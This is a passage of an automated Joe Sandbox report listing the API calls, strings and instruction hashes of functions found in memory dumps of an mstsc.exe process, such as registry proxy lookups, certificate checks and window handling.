                                                                                                                                                                                    • Instruction Fuzzy Hash: 6661C471A487186FDB25CFD4CC88FA57BA9AB49314F0A019DF944A72A2C7B0DC80DF91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,ProxyName,00000000,?,?,00000000), ref: 00949D93
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,AllowExplicitProxyName,00000000,00000000,?,00000004), ref: 00949E11
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValue$AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: AllowExplicitProxyName$ProxyName$hGPKey$isEnforcedByGP$isGPDefined$proxyHostName
                                                                                                                                                                                    • API String ID: 1819154049-3315540633
                                                                                                                                                                                    • Opcode ID: 0e143c3aa5055dd0bd8685584819032c45f98eb919510be24aae25e0c3f8ec71
                                                                                                                                                                                    • Instruction ID: f4e780166bcf4ea04763fe5a63a5d99d328a9561e4d2eedeba13d225e09bf74b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e143c3aa5055dd0bd8685584819032c45f98eb919510be24aae25e0c3f8ec71
                                                                                                                                                                                    • Instruction Fuzzy Hash: F251EE32A08384BEDB2ACF54D848F673BAAAB45714F1540DDF941AB1E2C771CD80EB91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • MstscRemoteSessionsMgrWndClass, xrefs: 009149EE
                                                                                                                                                                                    • Initialization of queued apps linked list failed!, xrefs: 0091496A
                                                                                                                                                                                    • Initialization of transaction linked list failed!, xrefs: 00914915
                                                                                                                                                                                    • Failed to register window class, xrefs: 009149B7
                                                                                                                                                                                    • m_cs.Init failed, xrefs: 00914A90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: Failed to register window class$Initialization of queued apps linked list failed!$Initialization of transaction linked list failed!$MstscRemoteSessionsMgrWndClass$m_cs.Init failed
                                                                                                                                                                                    • API String ID: 4061214504-3798914471
                                                                                                                                                                                    • Opcode ID: 7d0337835ecdd9e481c047959e444ffb174486e59e68ca5a14b4c5d700ad747c
                                                                                                                                                                                    • Instruction ID: 3260e7637af86937e1f60687e375bfa14010c2fc95d9204ed2a34a989cdd2004
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d0337835ecdd9e481c047959e444ffb174486e59e68ca5a14b4c5d700ad747c
                                                                                                                                                                                    • Instruction Fuzzy Hash: BA41D4327983586FD72ACB54C909FE67AD9AF4D310F070148FD40AB1A2C7A0DCC0AB99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,UseProxy,00000000,00000000,?,?), ref: 00949BDD
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,AllowExplicitUseProxy,00000000,00000000,?,00000004), ref: 00949C64
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                                    • String ID: AllowExplicitUseProxy$UseProxy$hGPKey$isEnforcedByGP$isGPDefined$pProxyUsage
                                                                                                                                                                                    • API String ID: 3660427363-3121813369
                                                                                                                                                                                    • Opcode ID: 5be6e15ba5b93559cc8e5c698567a0407b19f85418889d67249f292eaf2eea6d
                                                                                                                                                                                    • Instruction ID: e2c01bb9b8d761f5a3cbb8967b1d9aa371194b3dda8f99fb68e78699830adc78
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5be6e15ba5b93559cc8e5c698567a0407b19f85418889d67249f292eaf2eea6d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5551EF71A04344AFCB2ACF49E848F5B7FE9EB45304F0540E9F946AB1A2C6B0CD40DB91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,0000020A,?,00000000,00000000), ref: 0094822A
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,00000000,00000000), ref: 00948357
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLocal$AddressAllocHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: GetMUIHandle$LoadString$StringCchPrintf$allocate memory for resultStr
                                                                                                                                                                                    • API String ID: 139613657-1679347992
                                                                                                                                                                                    • Opcode ID: 65f483075e537be392fcfc2051cc81c3d82a0d4b0a8b65927a842505c700e456
                                                                                                                                                                                    • Instruction ID: d9e85f5f634dc2886f6a342a0addd6f8f73bf6f1f0cbdf1e500d73784e10ae63
                                                                                                                                                                                    • Opcode Fuzzy Hash: 65f483075e537be392fcfc2051cc81c3d82a0d4b0a8b65927a842505c700e456
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03411832A083586FDB399F54DD49F6B7AAAAF85B50F050488F944A71B2CFB4CC40EB51
APIs
• CertGetCertificateContextProperty.CRYPT32(?,00000003,?,?), ref: 00956882
• GetLastError.KERNEL32 ref: 009568AF
• GetLastError.KERNEL32 ref: 009568DB
• LocalAlloc.KERNEL32(00000040,?), ref: 009568F7
• memcpy.MSVCRT(00000000,?,?), ref: 00956951
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ErrorLast$AllocCertCertificateContextLocalPropertymemcpy
• String ID: *ppThumbprint$GetCertificateThumbPrint failed$d
• API String ID: 4217741636-268901519
• Opcode ID: bf5db0ca836e4f5734d2b1d9ddc7c71efcca685d416160860ebf7bab1031b267
• Instruction ID: 0a77aaeb84a61499118db0aed0f17472e8742e0668b25e0b6a48828235cd6ecc
• Opcode Fuzzy Hash: bf5db0ca836e4f5734d2b1d9ddc7c71efcca685d416160860ebf7bab1031b267
• Instruction Fuzzy Hash: D2414372618300AFCB25DF25D815F267BE9AB88315F14405DFD80AB2A2C671DC48EF92
APIs
• BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 022F3F12
Strings
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 022FE2FB
• ExecuteOptions, xrefs: 022F3F04
• CLIENT(ntdll): Processing section info %ws..., xrefs: 022FE345
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 022F3F75
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 022F3F4A
• Execute=1, xrefs: 022F3F5E
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 022F3EC4
Memory Dump Source
• Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
• Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
Similarity
• API ID: BaseDataModuleQuery
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 3901378454-484625025
• Opcode ID: 003d1c675c8aa8387d06b3d9e9d7eeac5236ef4704797d188ff83bcb7be998c3
• Instruction ID: a4f8308f00dea4cce5bb0455dc7fa67ad2e12ac50d7c3e043a1d3582e9c3758a
• Opcode Fuzzy Hash: 003d1c675c8aa8387d06b3d9e9d7eeac5236ef4704797d188ff83bcb7be998c3
• Instruction Fuzzy Hash: C64107716A030DBFEF20DAD4DC95FEAB3BCAF14704F0005A9E645E6084EB749A458F61
APIs
• ??2@YAPAXI@Z.MSVCRT ref: 0095B349
• ??2@YAPAXI@Z.MSVCRT ref: 0095B3A5
• ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000100), ref: 0095B430
• ??3@YAXPAX@Z.MSVCRT(00000000,?,00000100), ref: 0095B438
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ??2@??3@$AddressFreeHandleLibraryMessageModuleProcTrace
• String ID: HomeGroupUser$$PWSTR
• API String ID: 1240124958-672385545
• Opcode ID: a97e59f33343255292d3f79d0f335ef13ab6035d7fd08e26b624bebc768bce70
• Instruction ID: b0d7e0033d3ed5c6d36d74e79088166e4e40ba9023b7971ef184d07befc8965b
• Opcode Fuzzy Hash: a97e59f33343255292d3f79d0f335ef13ab6035d7fd08e26b624bebc768bce70
• Instruction Fuzzy Hash: FB21E1326083016EE739DF269C45F3A769DDB86326F15006EFC00A71F2CBA0CC48AB91
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,?,00000020), ref: 009164E1
• SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00916506
• GetSystemMetrics.USER32(00000000), ref: 0091651E
• GetSystemMetrics.USER32(00000001), ref: 00916525
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: System$Metrics$ByteCharInfoMultiParametersWide
• String ID: ($DISPLAY$h$h
• API String ID: 1415089127-1312831404
• Opcode ID: 987be12cc315e71f8cd2f357d3c54877b4aec39bc5180682354b024312c748ee
• Instruction ID: d504005c713ae8ff8ccdf82ff26f7f5633d9e8b300a2f01b7ac79b58fb533484
• Opcode Fuzzy Hash: 987be12cc315e71f8cd2f357d3c54877b4aec39bc5180682354b024312c748ee
• Instruction Fuzzy Hash: 1521A7B2F142289BDB21CF588D84BB777ACEB45720F10016AFC55AB195DAB0DD40CBA1
APIs
• GetDlgItem.USER32(?,00003309), ref: 00935B92
• SendMessageW.USER32(00000000,00000402,00000001,00000000), ref: 00935BAA
• SendMessageW.USER32(00000000,00000400,00000000,00000000), ref: 00935BB8
• SetDlgItemTextW.USER32(?,0000330B,?,?,00935623,?,?,?), ref: 00935BCF
• SetDlgItemTextW.USER32(?,0000330B,00000000,?,?), ref: 00935C18
• LocalFree.KERNEL32(00000000), ref: 00935C1F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Item$MessageSendText$FreeLocal
• String ID: FormatMessage failed
• API String ID: 449125137-2409667863
• Opcode ID: d833f289fe4b26300c8387ef69fb45b3d57e9b04d7f89dd93bdd5c4aa5c8e7dd
• Instruction ID: 4e5fefd0dd173df4e24d3c10d1d46d17f2c306b2cda06c7555a99e7691eb50ed
• Opcode Fuzzy Hash: d833f289fe4b26300c8387ef69fb45b3d57e9b04d7f89dd93bdd5c4aa5c8e7dd
• Instruction Fuzzy Hash: EE210571604308BFDB259B50CD89F7A7B69EB48314F190029F980AB1A2CBB1DE019E80
APIs
• GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,00000000), ref: 00945BDA
• GetProcAddress.KERNEL32(00000000), ref: 00945BE1
• GetCurrentProcess.KERNEL32(?), ref: 00945BFE
• GetCommandLineW.KERNEL32 ref: 00945C13
• ExpandEnvironmentStringsW.KERNEL32(%windir%\system32\mstsc.exe,?,00000104), ref: 00945C71
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: AddressHandleModuleProc$CommandCurrentEnvironmentExpandFreeLibraryLineMessageProcessStringsTrace
• String ID: %windir%\system32\mstsc.exe$IsWow64Process$kernel32
• API String ID: 3350929514-3730019692
• Opcode ID: 5397c265bef8a0ffe876a151fd654bf26aab00ef26b363d3d383f784ec3ad0db
• Instruction ID: 483df87d9c1cef5834046a6e7bdaf55c0f31235338dded770993f617c235aa6e
• Opcode Fuzzy Hash: 5397c265bef8a0ffe876a151fd654bf26aab00ef26b363d3d383f784ec3ad0db
• Instruction Fuzzy Hash: 6521D872A5831CAFD7309FF4DC89FA977A8AB44315F010599F845D3292CA70DD809F55
APIs
• ShowWindow.USER32(?,00000000), ref: 0091B252
• ShowWindow.USER32(?,00000000), ref: 0091B258
  • Part of subcall function 0091D776: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B5BC,00000016,00000000,?,0094570B,0091396B,00000000,0096AFA8,?,00964F32,0096AFA8,00000000), ref: 0091D787
• IsWindow.USER32(?), ref: 0091B285
• SendMessageW.USER32(?,00000423,00000000,00000000), ref: 0091B299
• ShowWindow.USER32(?,00000001), ref: 0091B2A4
• SetForegroundWindow.USER32(?), ref: 0091B2A9
• InvalidateRect.USER32(?,00000000,00000001), ref: 0091B2B5
• UpdateWindow.USER32 ref: 0091B2BE
Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Show$Message$ForegroundInvalidateRectSendTraceUpdate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3422817459-0
                                                                                                                                                                                    • Opcode ID: fa576a073ab221739640e52d675be7898ced8a68b7620612603dee926ec5610d
                                                                                                                                                                                    • Instruction ID: fb8bdf5e35b13ddc9df260b233e21153ceb6100371cebc85da250ef2e85c08f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa576a073ab221739640e52d675be7898ced8a68b7620612603dee926ec5610d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F2141B1214308AFD7215F16DD48AAA7BAAEF51715B00482DF29251470C7B29C92DB10
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CertVerifyCertificateChainPolicy.CRYPT32(00000002,?,0000000C,?), ref: 0095776A
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,?,?,00000000,00000002,?), ref: 00957798
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,?,?,00000000,00000002,?), ref: 009577C7
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    • CertFreeCertificateChain.CRYPT32(?,?,?,00000000,?,?,00000000,00000002,?), ref: 009578AA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RdpSignCertChainRevocationCheck, xrefs: 00957460
                                                                                                                                                                                    • ConstructCertificateChain failed!, xrefs: 009574E5
                                                                                                                                                                                    • ValidateCertificate failed, xrefs: 009578D0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CertCertificateChainErrorFreeLast$AddressHandleLibraryMessageModulePolicyProcTraceVerify
                                                                                                                                                                                    • String ID: ConstructCertificateChain failed!$RdpSignCertChainRevocationCheck$ValidateCertificate failed
                                                                                                                                                                                    • API String ID: 3723874871-2658871624
                                                                                                                                                                                    • Opcode ID: d2b7431e5c4dcfc23a4594e1c856ee2fc8c405318ad1d19bf6d103f4270ff90f
                                                                                                                                                                                    • Instruction ID: 1ffffa7afa81bca2503d9f26d1ffdd52765f35b92dbbcda3618762a07bfccc1c
                                                                                                                                                                                    • Opcode Fuzzy Hash: d2b7431e5c4dcfc23a4594e1c856ee2fc8c405318ad1d19bf6d103f4270ff90f
                                                                                                                                                                                    • Instruction Fuzzy Hash: F2E1C431618345AFD729CF99E489B65BAEAAB48301F14044CF940AB2F2D7B5CEC4DF16
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __fassign
                                                                                                                                                                                    • String ID: .$:$:
                                                                                                                                                                                    • API String ID: 3965848254-2308638275
                                                                                                                                                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                    • Instruction ID: da2724ded5239e8eb162b59679157de157c6df26ccbdea8d04ef20c4387821af
                                                                                                                                                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 64A19C71D2020ADACF24CFE4C8547BEB7B5BB05708FA4946AD403B7288D7B49B46EB51
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • LoadDefaultProfile Failed, xrefs: 0093C8FE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$AddressFreeHandleIconLibraryLoadModuleProcSendTrace
                                                                                                                                                                                    • String ID: LoadDefaultProfile Failed
                                                                                                                                                                                    • API String ID: 762468045-1435745046
                                                                                                                                                                                    • Opcode ID: 6d35d4e006c5ebc481eeabd653210addcb75d23a93b7939ed05cfa48e34f420a
                                                                                                                                                                                    • Instruction ID: 283620d5bae452915234e491cb9ba44fbe6de10650ce189f8f762bc03f650c47
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d35d4e006c5ebc481eeabd653210addcb75d23a93b7939ed05cfa48e34f420a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F51CFB5604B04AFDB29DF64C899B2577E6BB89304F1004ACF646EB2A2CB71EC44DF05
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000800,?,?,?,?,?,0095833F,?,?,00000000), ref: 0095845C
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Unable to initialize file name from moniker!, xrefs: 00958394
                                                                                                                                                                                    • Failed to close file stream!, xrefs: 00958427
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressAllocFreeHandleLibraryLocalMessageModuleProcTrace
                                                                                                                                                                                    • String ID: Failed to close file stream!$Unable to initialize file name from moniker!
                                                                                                                                                                                    • API String ID: 673940520-1650752352
                                                                                                                                                                                    • Opcode ID: 1ceb454d9e1ce9783f75e781494fa26889270e74bc64238bad972d440361a7cb
                                                                                                                                                                                    • Instruction ID: 241e1cd5d7e578025fda1f675c63e9dd1f6534e80d9e4c391e9a32d8c6c60d3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ceb454d9e1ce9783f75e781494fa26889270e74bc64238bad972d440361a7cb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0251F5716143456FD729CF6AC849F663B99BB09311F040599FE00BB2B2DB74DC88EB89
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000,00000000), ref: 00910B04
                                                                                                                                                                                      • Part of subcall function 0091142A: GetLastError.KERNEL32(00910B13), ref: 0091142A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorFileLastModuleName
                                                                                                                                                                                    • String ID: .tlb
                                                                                                                                                                                    • API String ID: 2776309574-1487266626
                                                                                                                                                                                    • Opcode ID: 9ceb8ea7bf6c018b29a0c553d3b50f3b888e45a3b6adcf71de232f13af22528c
                                                                                                                                                                                    • Instruction ID: 3f6150d2e4a6acb19fb4d8e3b9fc4406b7b7fd6980f2cc027d4cab5f4cf4713b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ceb8ea7bf6c018b29a0c553d3b50f3b888e45a3b6adcf71de232f13af22528c
• Instruction Fuzzy Hash: 69419471B4522D9BDF209FA49C94AFE73ACEB84314F1041A9EC45E7210E6B59EC4CB50
APIs
• IsWindow.USER32(?), ref: 009170AF
• DestroyWindow.USER32 ref: 009170BE
• IsWindow.USER32(?), ref: 009170C7
• DestroyWindow.USER32 ref: 009170D0
• DeleteObject.GDI32(00000000), ref: 009170DF
  • Part of subcall function 00910259: EnterCriticalSection.KERNEL32(0096B000,00000000,?,0091011C,00000000,00000001,?,00000000,?,00000000,00000000,?,?,?,0091007F,?), ref: 00910265
